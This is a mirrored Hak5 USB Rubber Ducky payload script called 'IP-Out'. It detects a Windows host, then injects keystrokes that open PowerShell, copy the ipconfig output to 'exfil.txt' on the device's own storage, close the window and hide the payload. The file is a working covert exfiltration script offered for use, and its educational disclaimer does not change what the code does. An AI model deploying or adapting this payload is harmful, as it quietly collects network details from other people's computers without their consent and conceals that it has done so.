Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/IP-Out/payload.txt
2968 views
1
REM Title: IP-Out

2
REM Author: Mavisinator30001

3
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB

4
REM Target: Any Windows System

5
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY

6
DEFINE #DRIVELABEL DUCKY

7
EXTENSION PASSIVE_WINDOWS_DETECT

8
    REM VERSION 1.1

9
    REM AUTHOR: Korben

10


11
    REM_BLOCK DOCUMENTATION

12
        Windows fully passive OS Detection and passive Detect Ready

13
        Includes its own passive detect ready.

14
        Does not require additional extensions.

15


16
        USAGE:

17
            Extension runs inline (here)

18
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

19
            boot delay

20
            $_OS will be set to WINDOWS or NOT_WINDOWS

21
            See end of payload for usage within payload

22
    END_REM

23


24
    REM CONFIGURATION:

25
    DEFINE #MAX_WAIT 150

26
    DEFINE #CHECK_INTERVAL 20

27
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

28
    DEFINE #NOT_WINDOWS 7

29


30
    $_OS = #NOT_WINDOWS

31


32
    VAR $MAX_TRIES = #MAX_WAIT

33
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

34
        DELAY #CHECK_INTERVAL

35
        $MAX_TRIES = ($MAX_TRIES - 1)

36
    END_WHILE

37
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

38
        $_OS = WINDOWS

39
    END_IF

40


41
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

42
        IF ($_OS == WINDOWS) THEN

43
            STRING HELLO WINDOWS!

44
        ELSE

45
            STRING HELLO WORLD!

46
        END_IF

47
    END_REM

48
END_EXTENSION

49
IF $_OS != WINDOWS

50
    STOP_PAYLOAD

51
END_IF

52
ATTACKMODE HID STORAGE

53
DELAY 500

54
GUI r

55
DELAY 300

56
STRINGLN Powershell

57
DELAY 1000

58
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }

59
WAIT_FOR_STORAGE_ACTIVITY

60
WAIT_FOR_STORAGE_INACTIVITY

61
ALT F4

62
ATTACKMODE OFF

63
HIDE_PAYLOAD

64


65